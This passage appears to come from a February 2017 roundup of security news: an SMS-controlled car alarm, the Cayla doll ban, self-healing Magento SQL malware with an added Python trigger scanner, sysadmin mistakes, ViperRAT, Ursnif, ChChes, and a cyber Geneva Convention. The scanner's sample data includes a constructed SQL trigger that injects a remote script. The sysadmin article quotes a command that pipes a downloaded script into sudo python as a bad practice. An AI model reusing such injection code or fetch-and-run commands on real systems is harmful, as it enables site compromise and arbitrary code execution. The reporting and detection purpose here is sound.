The developers of another control method for the car alarm system certainly have read none of our articles on the security of Android devices, as the car is operated through SMS commands. The thing is, the first and most common mobile Trojans that Kaspersky Lab faced were SMS Trojans, or malware that contains code for sending SMS surreptitiously, which was done through common Trojan operation as well as by a remote command issued by malefactors. As a result, the doors of a victim’s car can be unlocked if malware developers perform the following three steps:

1. Go through all of the SMS messages on the smartphone to look for car commands.
2. If the needed SMS messages have been located, extract the phone number and password from them in order to gain access.
3. Send an SMS message to the discovered number that unlocks the car’s doors.

All of these three steps can be done by a Trojan while its victim suspects nothing. The only thing that needs to be done, which malefactors are certainly capable of handling, is to infect the smartphone.

Conclusion

Being an expensive thing, a car requires an approach to security that is no less meticulous than that of a bank account. The attitude of car manufacturers and developers is clear: they strive to fill the market quickly with apps that have new features to provide quality-of-life changes to car owners. Yet, when thinking about the security of a connected car, its infrastructure safety (for control servers) and its interaction and infrastructure channels are not the only things worth considering. It is also worth paying attention to the client side, particularly to the app that is installed on user devices. It is too easy to turn the app against the car owner nowadays, and currently the client side is quite possibly the most vulnerable spot that can be targeted by malefactors.

At this point, it should be noted that we have not witnessed a single attack on an app that controls cars, and none of the thousands of malware samples we detect contain code for downloading the configuration files of such apps. However, contemporary Trojans are quite flexible: if one of these Trojans shows a persistent ad today (which cannot be removed by the user himself), then tomorrow it can upload a configuration file from a car app to a command-and-control server at the request of criminals. The Trojan could also delete the configuration file and override it with a modified one. As soon as all of this becomes financially viable for evildoers, new capabilities will soon arrive for even the most common mobile Trojans.


Germany Bans Internet-connected 'Spy' Doll Cayla

18.2.2017 securityweek Security

German regulators have banned an internet-connected doll called "My Friend Cayla" that can chat with children, warning Friday that it was a de facto "spying device".

Parents were urged to disable the interactive toy by the Federal Network Agency which enforces bans on surveillance devices.

"Items that conceal cameras or microphones and that are capable of transmitting a signal, and therefore can transmit data without detection, compromise people's privacy," said the agency's head, Jochen Homann.

"This applies in particular to children's toys. The Cayla doll has been banned in Germany. This is also to protect the most vulnerable in our society."

The doll works by sending a child's audio question wirelessly to an app on a digital device, which translates it into text and searches the internet for an answer, then sends back a response that is voiced by the doll.

The German regulators in a statement warned that anything a child says, or other people's conversations, could be recorded and transmitted without parents' knowledge.

"A company could also use the toy to advertise directly to the child or the parents," it said.

"Moreover, if the manufacturer has not adequately protected the wireless connection, the toy can be used by anyone in the vicinity to listen in on conversations undetected."

Genesis Toys, which manufactures the doll, says on its website that it "is committed to protecting your and your family's personal information.

"Our objective is to ensure that our products and services are safe and enjoyable for our customers".

It also says Cayla "is programmed to not utter, display or say words or images that would be inappropriate for children to see or hear".

The company regularly reviews "encryption and physical security measures" to guard against unauthorized access to customers' personal information.

But it warns on its website that "unfortunately no method of transmission over the Internet, or method of electronic storage, is 100 percent secure".

The regulation agency added that it would "inspect other interactive toys and, if necessary, will take further action".

The European Consumer Organization said it welcomed the decision but criticized the fact that consumers would struggle to get compensation.

Its head Monique Goyens said that "if connected toys, such as this speaking doll, can be hacked to spy on or talk to children, they must be banned."

She added that "EU product laws need to catch up with digital developments to deal with threats such as hacking, data fraud or spying".


Self-Healing Malware Hits Magento Stores

18.2.2017 securityweek Virus
A newly discovered piece of malware targeting Magento stores has a self-healing routine to restore itself after deletion, security researchers have discovered.

Self-healing malware isn’t new, with the first such threat reportedly spotted nearly three decades ago, as the memory-residing Trojan called Yankee Doodle, which could infect .com and .exe files. Discovered in September 1989, this piece of malware would play the tune “Yankee Doodle” every day at 17:00 if it was in memory.

Discovered by Jeroen Boersma, the recently spotted Magento-targeting malware is using a database trigger to restore itself in the event it has been deleted: every time a new order is made, injected SQL code searches the compromised Magento installation and, if it doesn’t find the malware, it re-adds it. The malware leverages SQL stored procedures for this operation.

According to Willem de Groot, who analyzed the threat, the malware’s infection point was a brute force attack on /rss/catalog/notifystock/ where the compromised shop was “otherwise completely patched.”

De Groot notes that the malware’s behavior renders previous cleaning routines useless, because removing the malicious code from the infected records will no longer ensure that the infection is gone. This would only work for regular JavaScript-based malware, which normally gets injected in the static header or footer HTML definitions in the database.

The newly observed malware ensures that the self-healing trigger is executed every time a new order is made. “The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself,” the security researcher explains.

According to de Groot, malware detection should now include database analysis as well, because file scanning is no longer efficient. “This discovery shows we have entered a new phase of malware evolution,” he notes.

The security researcher, who says this is the first malware written in SQL he has encountered to date, explains that, while Magento Enterprise and some community extensions contain legitimate triggers, Magento store owners should be able to detect the malware by searching for suspicious SQL code, “such as anything containing admin, .js, script or < (html tags).”
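As an added example (not part of the article, and not de Groot's Malware Scanner), the following Python scan applies the indicators named above to trigger and stored-routine bodies pulled from MySQL's information_schema. The trigger names and bodies in SAMPLE_ROWS are constructed for illustration, and the allowlist is a hypothetical mechanism for triggers you have already verified as legitimate.

```python
import re
from typing import Dict, Iterable, List, Tuple

# SQL to pull every trigger and stored routine body out of MySQL, in the
# (kind, schema, name, body) shape scan_definitions() expects. Run it with
# whatever driver you use; the scan below works on the returned rows.
FETCH_SQL = """
SELECT 'TRIGGER', TRIGGER_SCHEMA, TRIGGER_NAME, ACTION_STATEMENT
  FROM information_schema.TRIGGERS
UNION ALL
SELECT ROUTINE_TYPE, ROUTINE_SCHEMA, ROUTINE_NAME, ROUTINE_DEFINITION
  FROM information_schema.ROUTINES
"""

# The indicators de Groot names: admin, .js, script and < (HTML tags).
# Deliberately coarse; every match is reported with context for triage.
INDICATORS: Dict[str, re.Pattern] = {
    "admin": re.compile(r"admin", re.I),
    ".js": re.compile(r"\.js\b", re.I),
    "script": re.compile(r"script", re.I),
    "html tag": re.compile(r"<[a-z/!]", re.I),
}

Definition = Tuple[str, str, str, str]  # kind, schema, name, body


def scan_definitions(rows: Iterable[Definition],
                     allowlist: Iterable[str] = ()) -> List[dict]:
    """Flag every trigger/routine whose body matches at least one indicator.

    `allowlist` (hypothetical) takes names of triggers you have verified as
    legitimate (Magento Enterprise and some extensions ship their own), so
    a repeat scan only reports what is new.
    """
    allowed = set(allowlist)
    findings = []
    for kind, schema, name, body in rows:
        if name in allowed:
            continue
        hits, context = [], []
        for label, rx in INDICATORS.items():
            m = rx.search(body)
            if m:
                hits.append(label)
                context.append(body[max(0, m.start() - 25):m.end() + 25])
        if hits:
            findings.append({"kind": kind, "schema": schema, "name": name,
                             "indicators": hits, "context": context})
    return findings


# Constructed sample rows (hypothetical names and bodies, not taken from a
# real store) in the shape FETCH_SQL returns.
SAMPLE_ROWS: List[Definition] = [
    # Looks like an ordinary changelog trigger used by indexers.
    ("TRIGGER", "magento", "trg_stock_item_after_update",
     "BEGIN INSERT IGNORE INTO cataloginventory_stock_cl (entity_id) "
     "VALUES (NEW.product_id); END"),
    # Fires on every new order and re-adds a script tag to the header
    # config value whenever it is missing, as the article describes.
    ("TRIGGER", "magento", "trg_sales_order_after_insert",
     "BEGIN UPDATE core_config_data SET value = CONCAT(value, "
     "'<script src=\"https://example.invalid/x.js\"></script>') "
     "WHERE path = 'design/head/includes' "
     "AND value NOT LIKE '%example.invalid%'; END"),
    # Benign, but the coarse "script" indicator hits the word "description";
    # the reported context makes that obvious at a glance.
    ("TRIGGER", "magento", "trg_block_audit",
     "BEGIN INSERT INTO cms_block_audit (block_id, description) "
     "VALUES (NEW.block_id, NEW.title); END"),
    ("PROCEDURE", "magento", "sp_fix_null_prices",
     "BEGIN UPDATE catalog_product_index_price SET price = final_price "
     "WHERE price IS NULL; END"),
]

if __name__ == "__main__":
    for f in scan_definitions(SAMPLE_ROWS):
        print(f"{f['kind']} {f['schema']}.{f['name']}: "
              f"{', '.join(f['indicators'])}")
        for c in f["context"]:
            print("    ...", c, "...")
```

A routine that only trips on "script" because of a column such as description can be added to the allowlist after review; one that rewrites core_config_data or cms_block rows on an order insert is the pattern the article warns about.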

The researcher, who updated his Malware Scanner to detect the new patterns, also provides instructions on how to remove the infection after discovering suspicious code in a Magento installation. Magereport was also updated with the new patterns, he said.


The dumbest mistakes system administrators make

18.2.2017 SecurityWorld Security
Do as I say, not as I do: the mistakes of corporate IT administrators often exceed in severity those made by users. Here are the ten most common.

Security is not a purely technical problem; it is a people problem. You can integrate many technologies into your network, but in the end someone can still make a foolish human mistake.

And the worst part? These blunders are often made by exactly those who should know best how to avoid them: system administrators and other IT staff.

Last year's Intermedia Insider Risk Report 2015 states that IT professionals were the group most likely to commit "dangerous" security offenses, such as sharing login credentials, using personal passwords for corporate purposes, and giving personal-account credentials to other people.

Such mistakes tend to be far riskier than those made by ordinary users, because of the unrestricted privileges that administrators very often hold on the network.

IT professionals, like users, can fall victim to phishing, malware and other attacks, and stolen system-administrator credentials almost always lead to a far more serious breach.

Here are ten common security mistakes made by system administrators and other IT staff.
Mistake #1: Using sudo for everything

When you log in as root, you gain full control of the system. That can be very dangerous, because if your credentials are stolen, attackers can do whatever they want (in Windows terms: there is no need to log in with the Administrator account when you do not intend to perform tasks that require administrator level).

Instead of logging into the system directly as root, log in through your personal account and use the sudo command for specific commands when needed.

But it is easy to make a mistake if you are not careful. A script fails because one of its commands needed sudo, and now everything has to be run again. If you do not track which commands require elevated privileges and where they are not needed, you may end up running everything with sudo.

Mistake #2: Running scripts of unknown origin

Installing third-party Linux applications is another area where sudo can be misused. All you have to do is copy and paste a command (already set up to use sudo) directly into the terminal to run the installation script. Every single command in that script is then executed with elevated privileges.

Here is an example copied from the web (with the URL hidden):

sudo -v && wget -nv -O- https://xxx/xxx/linux-installer.py | sudo python -c "import sys; main=lambda:sys.stderr.write('Download failed\n'); exec(sys.stdin.read()); main()"

This grants sudo privileges to something hosted anywhere on the web, as well as to a local instance of Python commands. It cannot be recommended under any circumstances! Windows administrators face similar potential disasters when running downloaded PowerShell scripts.

Even if you trust the source, never assume that a script downloaded from the internet is safe. Always check the contents of the script first and verify that the commands it runs have no unwanted effect.

Mistake #3: Running privileged services with root account rights

Applications should never run as root. Create unique service accounts with very specific permissions for each application and service running on the machine.

Service accounts usually have no home directories, and their file-system rights are limited even if someone tries to log in with such an account. If attackers compromise a service account, they still have to succeed in running some local exploit to gain further rights to execute code.

Each application should use its own account for database access instead of the root or Administrator account. Web applications should be owned by the appropriate group and user. When assigning domain permissions to Windows applications, do not give the application administrator-level access.

Major Linux distributions take care of service accounts by default, but when an administrator manually configures third-party packages, it is easy to make a mistake.

Also remember to switch permissions after installation and configuration are complete, so that the root or Administrator account does not own the application.

Mistake #4: Reusing passwords

Go ahead and roll your eyes. We have all heard of the evils of using the same passwords for different websites, systems and applications. The fact remains that it is still a big problem, and system administrators are not immune to it either.

Mozilla recently announced that an unknown attacker broke into a privileged user account, got into the Bugzilla bug-tracking database and stole information about 53 critical vulnerabilities.

It turned out that this "privileged user" had used the Bugzilla database password on another website, where it was exposed.

In many cases servers are configured with weak administrator passwords or with the same passwords as other machines on the network.

Brute-force attacks using common passwords and dictionary words still work because enough people keep making this basic mistake. When multiple machines share the same password, the problem is compounded.

Instead of setting the same password on all machines, administrators should opt for a key file. Each server should have a public key file, and the system administrator's workstation should hold the private key corresponding to that public key.

This way the administrator can access all the machines on the network, but an attacker moving laterally through the network will not be able to log in without a valid key. In that case there is no password to capture.

Mistake #5: Sharing administrator accounts

Administrator accounts, such as those for database access and management portals, are often shared on the network. Instead of setting up the environment so that administrators request elevated privileges only when needed, these administrator accounts get passed around. And that is asking for trouble.

Ideally there should be separate accounts: one root account, and then each administrator should have their own account. Administrator accounts should not have the highest level of access upon login; an administrator can request special access rights when working on specific tasks.

The Intermedia report states that 32 percent of IT professionals have given their login credentials, including the password, to other employees.

It is bad enough not knowing exactly who is using administrator accounts, but worse still, passwords are rarely changed when an administrator leaves the company. And because passwords are not changed regularly, former colleagues can abuse them and cause damage with impunity.

The Intermedia survey found that one in five IT professionals said they would access company information even after leaving their current job.

Password-change policies, then, are certainly not just for end users. Change passwords regularly, especially for administrator and service accounts. And change passwords whenever the administrator in question leaves the company.

Mistake #6: Leaving troubleshooting settings in place

When troubleshooting, you may try various tricks and experiments to uncover and fix the problem. During these attempts there is a tendency to bypass the usual processes.

The problem arises when the issue is resolved and you move on to the next one. In the rush, administrators can forget and leave something in a state that allows exploitation.

Perhaps you opened ports in the firewall, for example while trying to figure out why an application was not responding. Once that is fixed, you have to go back and close those ports before attackers exploit them.


Hackers Are Using Android Malware To Spy On Israeli Military Personnel
17.2.2017 thehackernews Android

A group of highly sophisticated state-sponsored hackers is spying on the Israeli military by hacking into the personal Android phones of individual soldiers to monitor their activities and steal data.
A newly released research by Lookout and Kaspersky suggests that more than 100 Israeli servicemen from the Israeli Defense Force (IDF) are believed to have been targeted with spyware.
Dubbed ViperRAT, the malware has specifically been designed to hijack Israeli soldiers’ Android-based smartphones and remotely exfiltrate data of high value, including photos and audio recordings, directly from the compromised devices.
Modus Operandi Identified
According to the security firms, IDF personnel had been compromised by social engineering techniques — where the soldiers were lured via Facebook Messenger and other social networks into entering communications with hackers who posed as attractive women from various countries like Canada, Germany, and Switzerland.
The soldiers were then tricked into installing a trojanized version of two different, typically legitimate Android chat apps, SR Chat and YeeCall Pro, for easier communication.
The malware has also been distributed using a dropper hidden in other Android smartphone applications including a billiards game, an Israeli Love Songs player, and a Move To iOS app, which are common to Israeli citizens and available in the Google Play store.

The app then scanned soldiers' smartphones and downloaded another malicious application that masqueraded as an update for one of the already installed apps, such as WhatsApp, and tricked victims into granting various permissions in order to carry out surveillance.
This, in turn, allowed the attackers to execute on-demand commands, enabling them to control the phone's microphone and camera, eavesdrop on soldiers' conversations, and peer into live camera footage.
Besides this, the ViperRAT malware gathers a broad range of data from compromised devices including geolocation, call log, personal photos, SMS messages, cell phone tower information, network and device metadata, internet browsing, and app download history.
According to researchers, the hackers were able to successfully establish a widespread cyber espionage campaign by compromising dozens of mobile devices from Samsung, HTC, LG and Huawei belonging to over 100 Israeli soldiers.
Besides, of the almost 9,000 files exfiltrated from compromised devices, roughly 97 percent were identified by Lookout researchers as highly encrypted images taken using the device camera.
However, it's likely the IDF is not the only target.
The ViperRAT attack campaign started in July and continued to date, according to Kaspersky researchers.
Is Hamas Behind the Cyber-Spying Operation?
The IDF closely worked with Kaspersky Labs and Lookout to investigate this incident and theorized that Hamas was behind these attacks. However, Lookout researchers have come to doubt that theory.
According to Lookout researchers, "Based on tradecraft, the modular structure of code and use of cryptographic protocols [AES and RSA encryption] the actor appears to be quite sophisticated."
Researchers say Hamas is not known for sophisticated mobile capabilities, which makes it unlikely they are directly responsible for ViperRAT.
The IDF is currently working together with both Lookout and Kaspersky to identify infected targets and protect against further attacks, but there is one simple way to protect against ViperRAT: don't download apps from untrusted third-party sources.


Google Shares Data on Corporate Email Attacks

17.2.2017 securityweek Attack

A corporate email account is much more likely to receive malware, phishing and spam emails than a personal inbox, according to an analysis conducted by Google.

Google’s Gmail service has more than one billion active users and the company says it blocks hundreds of billions of attacks aimed at these accounts every week. At the RSA Conference this week, the search giant shared some insight on the threats targeting corporate inboxes and how the numbers compare to other types of accounts.

Data collected so far this year shows that a corporate email account is 4.3 times more likely to receive malware, 6.2 times more likely to receive a phishing email, and 0.4 times more likely to receive spam compared to personal inboxes.

While corporate accounts seem to be attackers’ favorite targets when it comes to spam and phishing, non-profit, education and government organizations are more likely to see malware attacks compared to businesses.

The entertainment, IT, and housing sectors are the most targeted in spam campaigns, but phishing attacks are more likely to be aimed at the finance and insurance sector. When it comes to malware attacks, real estate was by far the most targeted sector.

[Figure: Gmail malware attacks by sector. Sectors most targeted by malware in the first part of 2017]

The volume of phishing attempts depends on location – for instance, the financial sector in Japan receives a lot more phishing emails than in the United States and the United Kingdom. Google also noticed that the IT industry in Brazil sees roughly twice as many phishing attempts as in the U.S. and the U.K.

Japan and India are the countries with the most spammed inboxes, and the U.S., Germany and France are the largest spammers. In the first part of 2017, the highest percentage of phishing emails were sent to accounts in Japan, followed at a distance by Brazil, Canada and the United States.

Google’s experts pointed out that targets are selected based on several criteria, including size, type of organization, sector of activity, and location (country). That is why they believe defenses must be tailored based on each organization’s risk profile.


App-in-the-Middle Attacks Bypass Android Sandbox: Skycure

17.2.2017 securityweek Android

The Android sandbox environment previously known as Android for Work is susceptible to "app-in-the-middle attacks" that put enterprise data at risk, Skycure security researchers say.

The secure framework, currently referred to as “work features in Android,” is meant to address the BYOD (Bring Your Own Device) approach that brings millions of personal devices into business environments. Introduced in Android 5.0 Lollipop, the feature aims to separate business and personal data on the same device through the use of a second, business profile managed by IT administrators.

Having all of the business applications, email and documents managed and secured within the business profile but leaving the personal profile unrestricted would provide users a sense of increased privacy, because admins would not be able to manage or monitor their personal apps. The feature leverages the mechanism of user separation.

According to Skycure, while Android for Work was designed as an additional sandbox to prevent apps from outside the container from accessing data inside it, two ‘app-in-the-middle’ attacks allow malicious apps in the personal profile to break this wall. Thus, Android for Work is only a seemingly secure framework, and sensitive enterprise information can be accessed and stolen from the personal profile, they say.

The two attacks, however, prey on the weakest link in the security chain, namely the human factor. User interaction is required for both attacks to be successful, the researchers have discovered.

The first such attack, the security firm explains, relies on a malicious application in the personal profile acquiring permissions to view and take action on all notifications, including those from the sandboxed environment. Because Notifications access is a device-level permission, a malicious app would immediately have access to sensitive information such as calendar meetings, email messages and other information in these notifications.

“This capability circumvents the secure separation logic between personal and work profiles, which is offered by Android for Work. An app-in-the-middle attack may manipulate a user to enable the Notification Access permission (even for a legitimate function in the personal persona) in order to gain access to information in the work profile. If the malicious app is designed to transmit the information viewed in notifications to a command and control server, then the information contained in notifications is no longer secure,” Yair Amit, CTO & Co-Founder at Skycure, explains in a blog post.

The security company notes that an attacker could initiate a “forgot password” process on some enterprise systems and hijack the subsequent on-device notification, thus receiving full enterprise access, without necessarily being restrained to the mobile device. By immediately dismissing the notification and archiving the recovery email through the Android Notifications API, the malicious app could prevent the user from noticing the attack.

“This presents a serious threat to the use of Android for Work as a secure sandbox for mobile work productivity, as EMM [Enterprise Mobility Management] solutions have no mechanism to recognize or defend against it. The attacker may even capture 2-factor authentication and administrators will not have any visibility of the theft,” Amit says. The company also published a video to demonstrate this attack.

The second app-in-the-middle attack leverages Android’s Accessibility Service, which was designed to offer user interface enhancements when users interact with their device. Because this service has access to “virtually all content and controls, both reading and writing, on the device,” an application in the personal profile with Accessibility permissions could access applications executed in the sandbox, researchers say.

As detailed in this video demonstration, because the attack resides in the personal profile, which isn’t monitored or controlled from the work profile, IT administrators can’t detect the exposure of sensitive information if the malicious application uses the Accessibility Service, researchers say. However, for such an attack to be possible, an application would have to register as an Accessibility Service and manipulate the user to grant the access.

According to the security company, Android engineers have implemented an API for the whitelisting of Accessibility Services, which EMM vendors can implement in their Android for Work administration interfaces. This API, the company notes, can be circumvented either by a malicious app that has the same package name as a whitelisted legitimate app, or by an existing malicious app-in-the-middle Accessibility service that tricks the user into whitelisting it (because non-system Accessibility services already enabled on the device have to be whitelisted).

“The interesting thing about both of these app-in-the-middle methods of defeating the Android for Work profile separation is that the device and the Android operating system remain operating exactly as designed and intended. It is the user that must be tricked into placing the software on the device and activating the appropriate services that allow the malware access to sensitive information,” the security firm says.

Skycure notes that the Android team has been contacted on this matter but that their investigation determined that the aforementioned application behavior is intended, and not considered a security vulnerability. However, they agreed that the findings should be made public, “to raise awareness to the exposure.” The danger related to these issues, the company says, is the illusion of security that the sandbox offers.

“The attack flows that we uncovered exploit valuable capabilities of Android in a way that transforms these features into a major security risk to organizations that utilize Android for Work and expect it to stay secure. This is a user-experience vs. security tradeoff dilemma. We appreciate Google's commitment to security, but strongly believe that more work needs to be done in order to better protect organizations against App-in-the-Middle attacks,” Amit told SecurityWeek in an email.


Ursnif Banking Trojan's Distribution Networks Exposed

17.2.2017 securityweek Virus

Security researchers from Palo Alto Networks have managed to identify distribution networks used by the Ursnif banking Trojan to target various users worldwide.

The Ursnif Trojan is distributed via spam emails that contain malicious attachments meant to download the Ursnif executable from a remote site. While analyzing the threat, Palo Alto researchers discovered that there are two main components in the malware’s distribution network, namely a spam botnet to send malicious emails, and compromised web servers to host the malware.

The spam botnet, researchers say, is focused on delivering either banking Trojans or malware downloaders to vulnerable machines in Japan, Italy, Spain, Poland, Australia, and Germany. The compromised web servers, on the other hand, host banking Trojans and spam bot files that malicious downloaders distributed by spam would drop onto compromised machines.

Throughout 2016, millions of spam messages, the majority written in Japanese, were sent to users in Japan, with Shiotob (a.k.a. Bebloh or URLZone) being the most widely distributed threat (75 unique variants identified in 7 million spam emails). Although capable of stealing banking information itself, the malware was used only for downloading a secondary payload (such as Ursnif), at least in the second half of the year, the researchers say.

“Unit 42 observed millions of spam emails attacking Japanese recipients, some of whom could be running the banking Trojan and spam bot simultaneously. Though it is difficult to know the exact numbers of infections by the email campaign, we know the number is significant considering an increase in Japan-based IP addresses as a source of emails with malicious attachment,” Palo Alto says.

An analysis of 200 unique Japanese IP addresses that were spamming Shiotob revealed 250 unique malware samples being sent among 268,000 emails in 2016. While most payloads were either banking Trojans or downloaders, researchers discovered that attackers were adapting to the country. Thus, Ursnif and Shiotob were delivered in Australia; KINS and Ursnif in Italy; Shiotob and Ursnif in Japan; Ursnif and Tinba in Spain and Poland; and Ursnif and KINS in Germany.

Attackers were found to have made their infrastructure redundant by copying the malicious files on multiple servers. The researchers discovered more than 200 such files on 74 servers used by the threat actors between April 2015 and January 2017. Most were compromised personal or small-to-medium-sized business websites in Europe, which haven’t been maintained for years.

A breakdown of the malware found on these web servers revealed that Ursnif represented around half of the samples. KINS, Pushdo, Rovnix, Andromeda, Shiotob, and Zeus were also among the identified malware families.

“The actors deploying these banking Trojans use a spam bot network and compromised web servers. It is still unclear whether a single group attacks multiple countries with various threats by using the infrastructures, or if numerous threat actors share them,” the researchers note.


China-Linked Group Uses New Malware in Japan Attacks

17.2.2017 securityweek Virus

A China-linked threat actor has been using a new Trojan in attacks aimed at individuals and organizations located in or with ties to Japan, Palo Alto Networks reported on Thursday.

The group is known as menuPass, Stone Panda and APT10, and it has been active since at least 2009. The actor initially targeted defense contractors in the United States and elsewhere, and since 2014 it has also attacked organizations in Japan.

menuPass is known for using PlugX and PoisonIvy, which have been observed in campaigns launched by several actors. However, a recent menuPass operation, which took place between September and November 2016, involved a new Trojan, dubbed ChChes, that is unique to this group.

The recent operation targeted Japanese academics working in various scientific fields, a Japanese pharmaceutical company, and a US-based subsidiary of a Japanese manufacturing firm. The attacks started with spear-phishing emails that came from spoofed addresses, including those of the Sasakawa Peace Foundation and the White House.

One clue that linked ChChes to other tools used by menuPass was a shared import hash. However, experts also discovered connections in the infrastructure used in the recent and older attacks.

ChChes was disguised as a Word document and it was signed using a certificate from Italian spyware maker Hacking Team. The certificate was leaked when the company was hacked in July 2015, but it had been revoked long before the latest menuPass attacks. Researchers believe attackers may have used it in an effort to make attribution more difficult.

In addition to collecting information about the infected system, ChChes has modules that help it encrypt communications, execute shell commands, upload and download files, and load and execute DLLs, according to an analysis conducted by Japan’s Computer Emergency Response Team Coordination Center (JPCERT/CC).

Palo Alto Networks believes ChChes is only used to download other malware onto infected computers, especially since it does not have a persistence mechanism.

“In a successful intrusion, it may be only a first stage tool used by the attackers to orient where they landed in a network, and other malware will be deployed as a second stage layering for persistence and additional access as the attackers move laterally through a network,” researchers said in a blog post.


Microsoft Calls for Cyber Geneva Convention

17.2.2017 securityweek Congress
Brad Smith Keynote at RSA Conference 2017

The modern digital world is as much characterized by nation-sponsored cyber-attacks as it is by criminal cyber-attacks – and Microsoft is calling for an international cyber Geneva Convention to protect business, users and critical infrastructure before it spirals out of control.

In a blog post this week, President and Chief Legal Officer Brad Smith describes the need for a Digital Geneva Convention “that will commit governments to protecting civilians from nation-state attacks in times of peace.” Within this model, he sees the tech industry as ‘a neutral Digital Switzerland’ occupying the role of the Red Cross. It is a popularized re-working of arguments presented in Scott Charney’s June 2016 paper, An organizing model for cybersecurity norms development.

Smith also spoke at this week's RSA Conference in San Francisco on the topic.

Smith believes that the time is right. “Just as the world’s governments came together in 1949 to adopt the Fourth Geneva Convention to protect civilians in times of war, we need a Digital Geneva Convention that will commit governments to implement the norms that have been developed to protect civilians on the internet in times of peace.”

Key to this idea will be an international adoption of norms; that is, shared expectations of appropriate behavior. Various organizations have been working on such norms. “UN GGE, G20, US-Sino bilateral agreement all have worked toward shaping the appropriate and mutually agreed-upon behavior in the digital domain,” explains Andrea Limbago, Chief Social Scientist at Endgame and formerly Senior Technical Lead at the Joint Warfare Analysis Center.

“Are we at the beginning of a sea change in what the international community decides is acceptable behavior?” asked Jeff Moss, founder of Black Hat and DEF CON in September, 2016. “It doesn’t have to be a treaty; it can just be a norm. The next administration is going to have to drive those norms of behavior.”

But Brad Smith goes to the next step. He is arguing for just such an international treaty loosely modelled on the Fourth Geneva Convention. Is such a treaty feasible? It would require the international adoption of norms of behavior, coupled with the ability to definitively attribute wrongdoing.

Norms

Smith explains that the norms underpinning his convention “should commit governments to avoiding cyber-attacks that target the private sector or critical infrastructure or the use of hacking to steal intellectual property. Similarly, it should require that governments assist private sector efforts to detect, contain, respond to and recover from these events, and should mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them.”

The first two elements are uncontroversial: governments should not attack other nations, and governments should assist the private sector in recovering from such attacks. The third, however, is difficult: it commits governments to effective cyber weapon disarmament.

The US/China bilateral agreement in late 2015 is cited as the green shoots of norms development. The two countries “made important progress in 2015 to ban intellectual property cyber-theft.” Noticeably, however, while commercial espionage was banned, political espionage was omitted. Smith’s norms, however, would effectively neutralize government agencies’ ability to hack and spy.

The US/China agreement ultimately led to several countries, including the US, voluntarily adopting ‘norms of state behavior in cyberspace’, explains Phil Quade, currently CISO at Fortinet but previously executive manager at the Department of Defense. “These norms,” he explains, “helped to establish guidelines like not stealing intellectual property for commercial gain, not attacking critical infrastructure, not using CERTs for offensive actions, and cooperating with government law enforcement in their cybercrime investigations.” But, he added, they are “designed to exclude government intelligence activities.”

“Nation states have invested too much time, attention and money into cyber warfare and espionage machines to turn back the dial,” warns Eric O’Neill, currently Carbon Black's National Security Strategist, but formerly a member of the FBI’s Special Surveillance Group. It is unlikely that governments will include themselves in the norms they might otherwise endorse.

Attribution

Accurate attribution is essential for the effective operation of norms. Without it, there would be nothing to stop individual nations flouting them with impunity. “Cyberespionage,” says O’Neill, “relies on the difficulty of attribution, anonymity, and ease of access from anywhere in the world. When the U.S. has caught Russia, North Korea, Iran and China spying, probing our critical infrastructure, attacking our business, and stealing our data, each country staunchly denied the acts.”

Put simply, irrefutable technical attribution is impossible. But based on accumulative intelligence – from SIGINT, field agents, geopolitical analysis and more – one nation’s intelligence community can definitively attribute attackers – but only to its own government. It will not reveal full information on its methods of attribution to foreign countries, leaving continuing room for doubt.

Smith’s, and indeed, Charney’s, solution is an independent international committee of experts. “In addition,” wrote Smith, “a Digital Geneva Convention needs to create an independent organization that spans the public and private sectors. Specifically, the world needs an independent organization that can investigate and share publicly the evidence that attributes nation-state attacks to specific countries.”

There are two problems here: firstly, can such an organization succeed in genuine attribution without full intelligence community cooperation; and secondly, will all nations accept that attribution? “I think the logistics that would need to be involved to somehow accurately monitor and identify who is doing what to who is nearly impossible,” comments Nathan Wenzler, chief security strategist at AsTech; “especially considering the ease in which a malicious actor can hide, obfuscate, redirect, bluff and otherwise mislead where they're performing attacks from. For an organization like this to be successful, accurate proof which all parties involved can agree is correct would be the key. But the very nature of technology today would make that difficult at best. And even if you can monitor all traffic accurately, there would still be difficulty in getting the political factions involved to agree with the findings.”

Cyber Geneva Convention

A cyber Geneva Convention (that is, the formalization of agreed norms and accurate attribution into a binding international treaty) seems unlikely. Even beyond attribution, how do you sanction nations that have flouted the norms? As Phil Quade comments, “Rogue governments tend not to pay much attention to ‘norms of behavior’.”

A treaty would require teeth. “Any plausible Cyber Geneva Convention would require agreement on sanctions for a nation member that violates the convention,” says O’Neill. “Because attribution is extraordinarily difficult, these penalties may lack teeth if the convention cannot enforce them.”

There are other problems. Quade again: “The norms are for a peacetime environment, yet the boundaries for what constitutes peacetime or wartime in cyberspace are rarely clear.”

There can be little doubt that the path to an international convention on norms of acceptable cyber behavior is difficult, if not impossible; yet it remains a dream worth pursuing. Andrea Limbago suggests the world is currently caught between the impossibility of a convention and the distinct need for one.

“In the near and even mid-term,” she said, “a digital Geneva Convention is neither feasible nor likely, but that does not detract from the necessity to pursue forums and agreements to shape those proper guardrails of behavior within the digital domain; that is, norms. Basically, there is an urgent need for working toward those same goals, while a Geneva Convention remains years, decades away if it will ever occur.”

She believes that the internet is at an inflection point, poised between what she describes as multi-stakeholder and cyber sovereignty. Keys to the former are global internet freedoms, a balance between security and privacy, social integration and an understanding of what is ‘off limits’.

The latter is complete economic, social and political government control of the internet within national boundaries. It is disguised as nationalism and typified by surveillance, censorship, propaganda and disinformation. And it is already happening in Russia, China, Iran and elsewhere. Even the United Kingdom can now be described as a surveillance state with the sweeping powers given to law enforcement and intelligence agencies via the Investigatory Powers Act.

The balkanization of the internet is already in progress. It will be a problem and a difficulty for individuals; but it could prove a disaster for the large international companies currently operating across national boundaries – such as Microsoft. Internationally agreed norms of acceptable cyber behavior ultimately leading to a cyber convention could maintain and improve the democratic nature of the multi-stakeholder global internet.


This Ransomware Malware Could Poison Your Water Supply If Not Paid
17.2.2017 thehackernews Virus

Ransomware has been around for a few years, but in last two years, it has become an albatross around everyone's neck, targeting businesses, hospitals, financial institutions and personal computers worldwide and extorting millions of dollars.
Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data.
It has turned out to be a noxious game for hackers looking to get paid effortlessly.
Initially, ransomware used to target regular internet users, but in the past few months we have already seen the threat targeting enterprises, educational facilities, hospitals, hotels, and other businesses.
And now, the threat has gotten worse!
This PoC Ransomware Could Poison Water Supply!

Researchers at the Georgia Institute of Technology (GIT) have demonstrated the capability of ransomware to take down the critical infrastructure our cities need to operate, causing havoc among people.
